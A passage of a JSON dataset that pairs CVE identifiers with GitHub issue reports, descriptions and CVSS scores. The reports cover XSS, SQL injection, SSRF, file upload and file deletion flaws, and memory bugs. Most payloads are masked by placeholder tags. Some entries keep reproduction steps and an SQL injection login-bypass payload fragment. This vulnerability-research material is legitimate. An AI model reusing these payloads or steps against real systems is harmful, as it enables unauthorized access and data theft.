        "description": "Search function Cross Site Script(XSS) Vulnerability. XSS Payload APITAG There is an xss vulnerability in all search functions. Since there are many locations, only three locations are provided to prove the existence of the vulnerability URL\uff1a \u83dc\u5355\u7ba1\u7406 URLTAG FILETAG URL\uff1a python\u4f9d\u8d56\u5e93 URLTAG FILETAG URL\uff1a hydra\u5217\u8868 URLTAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-24177",
        "Issue_Url_old": "https://github.com/zhao1231/cve_payload/issues/1",
        "Issue_Url_new": "https://github.com/zhao1231/cve_payload/issues/1",
        "Repo_new": "zhao1231/cve_payload",
        "Issue_Created_At": "2022-02-09T03:38:05Z",
        "description": "Ex libris_xss vulnerability. aaaa",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-24181",
        "Issue_Url_old": "https://github.com/pkp/pkp-lib/issues/7649",
        "Issue_Url_new": "https://github.com/pkp/pkp-lib/issues/7649",
        "Repo_new": "pkp/pkp-lib",
        "Issue_Created_At": "2022-01-25T21:29:50Z",
        "description": "Add support for limiting allowed hosts. PATHTAG currently uses the APITAG , APITAG , and APITAG headers to detect the current hostname for formulating absolute URLs. Per URLTAG these headers may be user controlled and thus not trustworthy. This could be used to e.g. send password reset emails with poisoned links that direct the user to a NUMBERTAG rd party site, where the reset hash can be captured. Add support for a configuration file based whitelist of allowed hosts; the PATHTAG should pass the host through this filter before using it.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-24193",
        "Issue_Url_old": "https://github.com/IceWhaleTech/CasaOS/issues/84",
        "Issue_Url_new": "https://github.com/icewhaletech/casaos/issues/84",
        "Repo_new": "icewhaletech/casaos",
        "Issue_Created_At": "2022-01-26T07:30:28Z",
        "description": "A security vulnerability which will lead to controller the system. Describe the bug Here is a security vulnerability will lead to controller the system. Detail URLTAG and the password is sent to Guan. EMAILTAG .",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-24223",
        "Issue_Url_old": "https://github.com/thedigicraft/Atom.CMS/issues/255",
        "Issue_Url_new": "https://github.com/thedigicraft/atom.cms/issues/255",
        "Repo_new": "thedigicraft/atom.cms",
        "Issue_Created_At": "2022-01-28T11:37:41Z",
        "description": "i think there's a Sql injection in FILETAG . In APITAG APITAG i post: APITAG NUMBERTAG password NUMBERTAG then, I can log in to the system with the wrong password",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-24229",
        "Issue_Url_old": "https://github.com/ONLYOFFICE/document-server-integration/issues/252",
        "Issue_Url_new": "https://github.com/onlyoffice/document-server-integration/issues/252",
        "Repo_new": "onlyoffice/document-server-integration",
        "Issue_Created_At": "2022-01-28T06:54:33Z",
        "description": "FILETAG FILETAG Vulnerability param: type Vulnerability URL: URLTAG FILETAG FILETAG Vulnerability param: lang Vulnerability URL: URLTAG FILETAG FILETAG Vulnerability Solution Close the test example in Document Server",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-24249",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/2081",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/2081",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2022-01-28T10:38:34Z",
        "description": "Null Pointer Dereference when dealing with APITAG version info : CODETAG poc : poc URLTAG command : APITAG hint out /dev/null $poc$ crash : ERRORTAG Here is the trace reported by debugging. We can see that the memcpy function is called on line NUMBERTAG of APITAG , which will copy the contents of the second parameter data to the buffer pointed to by the first parameter. Unfortunately, in this trace the data is NUMBERTAG NULL), causing the program to crash. CODETAG I tracked the null assignment of data in APITAG . APITAG is initialized to NULL in line NUMBERTAG When the value of APITAG is greater than NUMBERTAG line NUMBERTAG the program will allocate a memory chunk to APITAG ( line NUMBERTAG Otherwise, APITAG will remain NULL and will be assigned to APITAG in line NUMBERTAG In my crash, APITAG was set to NUMBERTAG causing APITAG to be NULL. The tag is then added to APITAG for subsequent access ( line NUMBERTAG URLTAG When the program executes to APITAG , it will get a tag from APITAG ( line NUMBERTAG and pass APITAG to the second parameter of APITAG ( line NUMBERTAG which eventually results in data being NULL. Although the program judges whether APITAG is NUMBERTAG in line NUMBERTAG it does not change the execution flow of the program and the value of APITAG . URLTAG Hope my analysis will help.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-24263",
        "Issue_Url_old": "https://github.com/kishan0725/Hospital-Management-System/issues/17",
        "Issue_Url_new": "https://github.com/kishan0725/hospital-management-system/issues/17",
        "Repo_new": "kishan0725/hospital-management-system",
        "Issue_Created_At": "2022-01-25T17:07:00Z",
        "description": "Bypass authentication with SQL Injection. VULNERABLE: SQL Injection Authentication Bypass exists in Hospital Management System. An attacker can inject query in PATHTAG via the \u2018email\u2019 parameters. + Description: The vulnerability is present in the PATHTAG \" , and can be exploited throuth a POST request via the \u2018email\u2019 parameters. + Impact: Allow attacker inject query and access , disclosure of all data on the system. + Suggestions: User input should be filter, Escaping and Parameterized Queries. + Payload: email =' or NUMBERTAG limit NUMBERTAG File affect: + FILETAG + Proof of concept (POC): + Inject payload: + FILETAG + Bypass authentication success and redirect admin panel + FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-24264",
        "Issue_Url_old": "https://github.com/CuppaCMS/CuppaCMS/issues/13",
        "Issue_Url_new": "https://github.com/cuppacms/cuppacms/issues/13",
        "Repo_new": "cuppacms/cuppacms",
        "Issue_Created_At": "2022-01-03T11:13:24Z",
        "description": "VULNERABLE: SQL injection vulnerability exists in APITAG PATHTAG via the \u2018search_word\u2019 parameters. + VULNERABLE: SQL injection vulnerability exists in APITAG An attacker can inject query in PATHTAG via the \u2018search_word\u2019 parameters. + Date: PATHTAG + Exploit Author: Tr\u01b0\u01a1ng H\u1eefu Ph\u00fac + Contact me: + Github: URLTAG + Email: EMAILTAG + Product: APITAG + Description: The vulnerability is present in the PATHTAG , and can be exploited throuth a POST request via the \u2018search_word\u2019 parameters. + Impact: Allow attacker inject query and access , disclosure of all data on the system. + Suggestions: User input should be filter, Escaping and Parameterized Queries. + Payload: ERRORTAG + Proof of concept (POC): FILETAG + You can see injection code query into search_word parameters as show below + Request: FILETAG + You see version , database and data as show below + Response: FILETAG + Request and Response: FILETAG + Report: FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-24265",
        "Issue_Url_old": "https://github.com/CuppaCMS/CuppaCMS/issues/14",
        "Issue_Url_new": "https://github.com/cuppacms/cuppacms/issues/14",
        "Repo_new": "cuppacms/cuppacms",
        "Issue_Created_At": "2022-01-04T10:07:38Z",
        "description": "SQL injection vulnerability exists in APITAG An attacker can inject query in PATHTAG via the PATHTAG parameters.. + VULNERABLE: SQL injection vulnerability exists in APITAG An attacker can inject query in PATHTAG via the PATHTAG parameters. + Date: PATHTAG + Exploit Author: Tr\u01b0\u01a1ng H\u1eefu Ph\u00fac + Contact me: + Github: URLTAG + Email: EMAILTAG + Product: APITAG + Description: The vulnerability is present in the PATHTAG , and can be exploited throuth a POST request via the PATHTAG parameters. + Impact: Allow attacker inject query and access , disclosure of all data on the system. + Suggestions: User input should be filter, Escaping and Parameterized Queries. + Payload Boolean true: PATHTAG and NUMBERTAG Payload Boolean false: PATHTAG and NUMBERTAG Payload exploit example: PATHTAG and APITAG + Payload exploit: PATHTAG and APITAG + Proof of concept (POC): + Payload Boolean true: PATHTAG and NUMBERTAG Request and Response: FILETAG + Payload Boolean false: PATHTAG and NUMBERTAG Request and Response: FILETAG + Exploit: FILETAG FILETAG + Report: FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-24266",
        "Issue_Url_old": "https://github.com/CuppaCMS/CuppaCMS/issues/17",
        "Issue_Url_new": "https://github.com/cuppacms/cuppacms/issues/17",
        "Repo_new": "cuppacms/cuppacms",
        "Issue_Created_At": "2022-01-06T15:19:45Z",
        "description": "Time based SQL Injection PATHTAG via the \u2018order_by\u2019 parameters.. + VULNERABLE: SQL injection vulnerability exists in APITAG An attacker can inject query in PATHTAG via the \u2018order_by\u2019 parameters. + Date: PATHTAG + Exploit Author: Tr\u01b0\u01a1ng H\u1eefu Ph\u00fac + Contact me: + Github: URLTAG + Facebook: URLTAG + Email: EMAILTAG + Product: APITAG + Description: The vulnerability is present in the PATHTAG , and can be exploited throuth a POST request via the \u2018order_by\u2019 parameters. + Impact: Allow attacker inject query and access , disclosure of all data on the system. + Suggestions: User input should be filter, Escaping and Parameterized Queries. + Proof of concept (POC): File report: URLTAG Video Poc: URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-24278",
        "Issue_Url_old": "https://github.com/neocotic/convert-svg/issues/86",
        "Issue_Url_new": "https://github.com/neocotic/convert-svg/issues/86",
        "Repo_new": "neocotic/convert-svg",
        "Issue_Created_At": "2022-06-06T17:56:18Z",
        "description": "Remote Code Injection vulnerable. I found the issue from version NUMBERTAG The issue is that it sanitizes svg tag only once time. so I add another svg tag which is APITAG before the original payload that I used before. CODETAG It's still vulnerable to remote code injection with directory traversal vulnerability.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-24429",
        "Issue_Url_old": "https://github.com/neocotic/convert-svg/issues/84",
        "Issue_Url_new": "https://github.com/neocotic/convert-svg/issues/84",
        "Repo_new": "neocotic/convert-svg",
        "Issue_Created_At": "2022-06-03T05:22:40Z",
        "description": "Remote Code Injection vulnerable. Affected versions of this package are vulnerable to Remote Code Injection. Using a specially crafted SVG file, an attacker could read arbitrary files from the file system and then show the file content as a converted PNG file. FILETAG I've tested on NUMBERTAG ersion at the latest version. I've saw that the code patched with removing \"onload\" attribute at svg tag. But that was not enough to prevent script execution. I bypass it with \"onfocus\" attribute with \"autofocus\" attribute on svg tag. And with many other svg tags for waiting execution of scripts that assigned in onfocus attribute. Payload CODETAG I checked on the latest version. FILETAG Latest version on NPM FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-24434",
        "Issue_Url_old": "https://github.com/mscdex/busboy/issues/250",
        "Issue_Url_new": "https://github.com/mscdex/busboy/issues/250",
        "Repo_new": "mscdex/busboy",
        "Issue_Created_At": "2021-08-05T18:27:04Z",
        "description": "Security alert: Busboy can crash on manipulated multipart/form data header names. I already wrote a PR for this problem. which is actually a problem of Dicer which busboy uses. For more information see mscdex/dicer NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-24553",
        "Issue_Url_old": "https://github.com/zfaka-plus/zfaka/issues/260",
        "Issue_Url_new": "https://github.com/zfaka-plus/zfaka/issues/260",
        "Repo_new": "zfaka-plus/zfaka",
        "Issue_Created_At": "2022-01-31T03:17:01Z",
        "description": "Zfaka Backend APITAG version). in the background file upload, Zfaka only has one JS check in PATHTAG there is no filtering for the file extension, and there is only one front end JS verification, So disabling JS can directly implement the background rce FILETAG The controller of upload in the background is located in PATHTAG The upload path will not be returned after the file is uploaded, but we already know the upload path and the naming rules of the uploaded file FILETAG UPLOAD_ Path is defined as follows APITAG CUR_ Date is defined as follows APITAG file name APITAG Taking NUMBERTAG as an example, the output results are as follows FILETAG Take NUMBERTAG on May NUMBERTAG as an example The full file path is APITAG Construct form directly CODETAG At the same time, you need to add referers: URLTAG , and modify the Otherwise, \"please select product ID\" will be prompted Finally, the complete upload HTTP request is as follows ERRORTAG Direct upload succeeded Then run the last seconds with burpsuite intruder After all, the number of seconds can't be so accurate FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-24568",
        "Issue_Url_old": "https://github.com/201206030/novel-plus/issues/80",
        "Issue_Url_new": "https://github.com/201206030/novel-plus/issues/80",
        "Repo_new": "201206030/novel-plus",
        "Issue_Created_At": "2022-02-01T16:38:03Z",
        "description": "novel plus NUMBERTAG can be attacked by SSRF. Exploit Step NUMBERTAG isit the following page APITAG Step NUMBERTAG type the information in the picture FILETAG Code Analysis URLTAG URLTAG That means attacker can request intranet resource (such as novel admin)",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-24575",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/2058",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/2058",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2022-01-21T08:54:48Z",
        "description": "Use After Free. ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-24576",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/2061",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/2061",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2022-01-21T08:56:18Z",
        "description": "Heap based Buffer Overflow. ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-24594",
        "Issue_Url_old": "https://github.com/walinejs/waline/issues/785",
        "Issue_Url_new": "https://github.com/walinejs/waline/issues/785",
        "Repo_new": "walinejs/waline",
        "Issue_Created_At": "2022-01-30T01:15:54Z",
        "description": "APITAG waline fake any ip vulnerability. \u95ee\u9898\u63cf\u8ff0 | Describe the bug URLTAG \u95ee\u9898\u7f51\u7ad9 | Website URL FILETAG \u670d\u52a1\u90e8\u7f72\u5728\u54ea\u91cc\uff1f | Where your waline deploy? Vercel APITAG \u6570\u636e\u5b58\u50a8\u5728\u54ea\u91cc\uff1f| Where your comment data store? APITAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-24599",
        "Issue_Url_old": "https://github.com/mpruett/audiofile/issues/60",
        "Issue_Url_new": "https://github.com/mpruett/audiofile/issues/60",
        "Repo_new": "mpruett/audiofile",
        "Issue_Created_At": "2022-02-02T13:25:06Z",
        "description": "Memory leak bug in printfileinfo, in printinfo.c. There exists one Memory leak bug in printfileinfo, in printinfo.c, which allows an attacker to leak the address of heap or libc via a crafted file. To reproduce with the attached poc file: FILETAG Heap address leak: ./sfinfo . APITAG APITAG the output of Copyright): ERRORTAG Libc address leak: ./sfinfo . APITAG APITAG the output of Copyright): ERRORTAG This vulnerability can be triggered anywhere the printfileinfo function is called, for example, sfconvert. The poc.py will help you to calculate the address, which is test on Ubuntu NUMBERTAG python2. Usage of poc.py: CODETAG The audiofile project is built with: APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-24612",
        "Issue_Url_old": "https://github.com/EyesOfNetworkCommunity/eonweb/issues/114",
        "Issue_Url_new": "https://github.com/eyesofnetworkcommunity/eonweb/issues/114",
        "Repo_new": "eyesofnetworkcommunity/eonweb",
        "Issue_Created_At": "2022-02-03T00:58:30Z",
        "description": "APITAG Hello, Il y a un petit soucis dans le contr\u00f4le des fichiers upload\u00e9s via le file upload du module ITSM. La possibilit\u00e9 d'uploader du format XML devrait se suivre d'un contr\u00f4le du dit fichier, en l'\u00e9tat il est possible d'uploader (via un user authentifi\u00e9), un document XML contenant une XSS ou d'autres joyeuset\u00e9es malicieuses. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2022-24613",
        "Issue_Url_old": "https://github.com/drewnoakes/metadata-extractor/issues/561",
        "Issue_Url_new": "https://github.com/drewnoakes/metadata-extractor/issues/561",
        "Repo_new": "drewnoakes/metadata-extractor",
        "Issue_Created_At": "2021-12-10T19:26:48Z",
        "description": "A list of bugs found NUMBERTAG bugs in total NUMBERTAG Unique Bugs Found Recently we ( Zhang Cen URLTAG and Huang Wenjie URLTAG discovered a series of bugs in latest metadta extractor NUMBERTAG Every bug we reported in the following is unique and reproducable. We sorted and refined them from thousands of crashes. Furthermore, they have been manually analyzed and triaged in removing the duplicates. APITAG Due to the lack of contextual knowledge in the metadta extractor library, we cannot thoroughly fix some bugs hence we look forward to any proposed plan from the developers in fixing these bugs NUMBERTAG Bug Report and Crash Seeds The bug report folder can be downloaded from URLTAG It contains both reports and crash seeds NUMBERTAG Test Program to Reproduce Crashes The test program can be downloaded from URLTAG Total NUMBERTAG bugs are reported in this pull request. A full list is provided below NUMBERTAG Folder Structure Level NUMBERTAG folder): exception type Level NUMBERTAG folder): error location Level NUMBERTAG files): POC file and FILETAG including reproducing steps NUMBERTAG FILETAG content NUMBERTAG Exception type NUMBERTAG Error location NUMBERTAG Bug cause and impact NUMBERTAG Crash thread's stacks NUMBERTAG Steps to reproduce NUMBERTAG Bug Full List etadata extractor_reported_crashes \u251c\u2500\u2500 ERRORTAG \u2502\u00a0\u00a0 \u2514\u2500\u2500 APITAG APITAG NUMBERTAG ERRORTAG \u2502\u00a0\u00a0 \u251c\u2500\u2500 APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG ERRORTAG \u2502\u00a0\u00a0 \u251c\u2500\u2500 APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG ERRORTAG \u2502\u00a0\u00a0 \u251c\u2500\u2500 APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG ERRORTAG \u2502\u00a0\u00a0 \u251c\u2500\u2500 APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG ERRORTAG \u2502\u00a0\u00a0 \u251c\u2500\u2500 ERRORTAG \u2502\u00a0\u00a0 \u251c\u2500\u2500 APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG ERRORTAG \u2502\u00a0\u00a0 \u251c\u2500\u2500 APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG ERRORTAG \u251c\u2500\u2500 APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG Any further discussion for these vulnerabilities including fix is welcomed and look forward to hearing from you. Feel free to contact me at EMAILTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-24615",
        "Issue_Url_old": "https://github.com/srikanth-lingala/zip4j/issues/418",
        "Issue_Url_new": "https://github.com/srikanth-lingala/zip4j/issues/418",
        "Repo_new": "srikanth-lingala/zip4j",
        "Issue_Created_At": "2022-03-31T09:40:41Z",
        "description": "Does CVETAG affect versions NUMBERTAG and NUMBERTAG According to the NVD description of CVETAG URLTAG , CVETAG affects up to NUMBERTAG excluded). Actually NUMBERTAG and NUMBERTAG are also affected by CVETAG . Don't the versions affected by nvd CVETAG need to be modified?",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-24615",
        "Issue_Url_old": "https://github.com/srikanth-lingala/zip4j/issues/377",
        "Issue_Url_new": "https://github.com/srikanth-lingala/zip4j/issues/377",
        "Repo_new": "srikanth-lingala/zip4j",
        "Issue_Created_At": "2021-10-24T15:43:05Z",
        "description": "Collection of Recent Reported Bugs for zip4j NUMBERTAG Recently we ( Zhang Cen URLTAG and Huang Wenjie URLTAG found and submitted several bugs of latest zip4j NUMBERTAG For your convenience, here lists the bug summary for all reported bugs (will keep it updated). Note that each issue is a unique bug (we sorted and refined them from thousands of crashes) Any discussion about the bugs are welcome. URLTAG URLTAG URLTAG URLTAG URLTAG URLTAG URLTAG URLTAG URLTAG URLTAG URLTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-24620",
        "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/1605",
        "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/1605",
        "Repo_new": "piwigo/piwigo",
        "Issue_Created_At": "2022-02-02T19:14:54Z",
        "description": "Piwigo NUMBERTAG ulnerable For Stored XSS Which Is Leading To Privilege Escalation. Hi, I found Stored XSS in Piwigo version NUMBERTAG APITAG tested older versions). Proof Of Concept NUMBERTAG Add an admin through webmaster's access NUMBERTAG Through the admin account open URLTAG NUMBERTAG Add APITAG APITAG space) in the group name field. Can use any malicious JS code, Now you can see XSS will pop up. Impact: In this way admin can easily takeover webmaster's access using FILETAG . Burp: ERRORTAG FILETAG Please fix the vulnerability & let me know :). Thank You! Chirag Artani URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2022-24646",
        "Issue_Url_old": "https://github.com/kishan0725/Hospital-Management-System/issues/18",
        "Issue_Url_new": "https://github.com/kishan0725/hospital-management-system/issues/18",
        "Repo_new": "kishan0725/hospital-management-system",
        "Issue_Created_At": "2022-02-05T12:14:10Z",
        "description": "VULNERABLE: SQL Injection exists in Hospital Management System. An attacker can inject query in PATHTAG via the APITAG parameters.. FILETAG Intercept contact info and save contents into a text APITAG FILETAG Run APITAG APITAG FILETAG Area of concern in FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-24647",
        "Issue_Url_old": "https://github.com/CuppaCMS/CuppaCMS/issues/23",
        "Issue_Url_new": "https://github.com/cuppacms/cuppacms/issues/23",
        "Repo_new": "cuppacms/cuppacms",
        "Issue_Created_At": "2022-02-05T17:14:57Z",
        "description": "Multiple Unauthorized Arbitrary File Deletion vulnerabilities. Vulnerability Name: Multiple Arbitrary File Deletion Date of Discovery NUMBERTAG Feb NUMBERTAG Product APITAG NUMBERTAG FILETAG Author: lyy Vulnerability Description: When unsanitized user input is supplied to a file deletion function, an arbitrary file deletion vulnerability arises. This occurs in PHP when the APITAG function is called and user input might affect portions of or the whole affected parameter, which represents the path of the file to remove, without sufficient sanitization. Exploiting the vulnerability allows an attacker to delete any file in the web root (along with any other file on the server that the PHP process user has the proper permissions to delete). Furthermore, an attacker can leverage the capability of arbitrary file deletion to circumvent certain webserver security mechanisms such as deleting .htaccess file that would deactivate those security constraints. Proof of Concept NUMBERTAG ulnerable URL: FILETAG Vulnerable Code: line NUMBERTAG PATHTAG FILETAG Steps to Reproduce: APITAG the request directly through burp CODETAG Proof of Concept NUMBERTAG ulnerable URL: FILETAG Vulnerable Code: line NUMBERTAG PATHTAG FILETAG APITAG can traverse the directory to delete any file Steps to Reproduce: APITAG the request directly through burp CODETAG FILETAG APITAG can traverse directories and delete APITAG all files in the directory while deleting the directory, so as to achieve the effect of deleting any file",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.2,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-24676",
        "Issue_Url_old": "https://github.com/hyyyp/HYBBS2/issues/33",
        "Issue_Url_new": "https://github.com/hyyyp/hybbs2/issues/33",
        "Repo_new": "hyyyp/hybbs2",
        "Issue_Created_At": "2022-02-07T10:08:23Z",
        "description": "There is an arbitrary file upload vulnerability in the HYBBS upload plugin function. There is an arbitrary file upload vulnerability in the HYBBS upload plugin function Vulnerability overview There is an arbitrary file upload vulnerability in the upload plugin function of the HYBBS management background, which can lead to server permissions. Vulnerability scope All versions prior to HYBBS NUMBERTAG ulnerability environment construction Clone the latest code factory library of HYBBS to the local, and then use phpstudy to build HYBBS. Vulnerability reproduction steps Make a malicious zip archive as shown below FILETAG Upload malicious zip archives in the management background upload plugin function FILETAG After uploading, it prompts that the upload was successful FILETAG It can be seen from the log of the folder monitoring software that HYBBS renamed the malicious compressed package and extracted it to the Plugin directory FILETAG FILETAG Vulnerability code analysis Locate the code of the plugin upload function FILETAG FILETAG HYBBS directly decompresses the compressed package and does not check the content of the compressed package, resulting in an arbitrary file upload vulnerability.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-24677",
        "Issue_Url_old": "https://github.com/hyyyp/HYBBS2/issues/34",
        "Issue_Url_new": "https://github.com/hyyyp/hybbs2/issues/34",
        "Repo_new": "hyyyp/hybbs2",
        "Issue_Created_At": "2022-02-07T10:09:48Z",
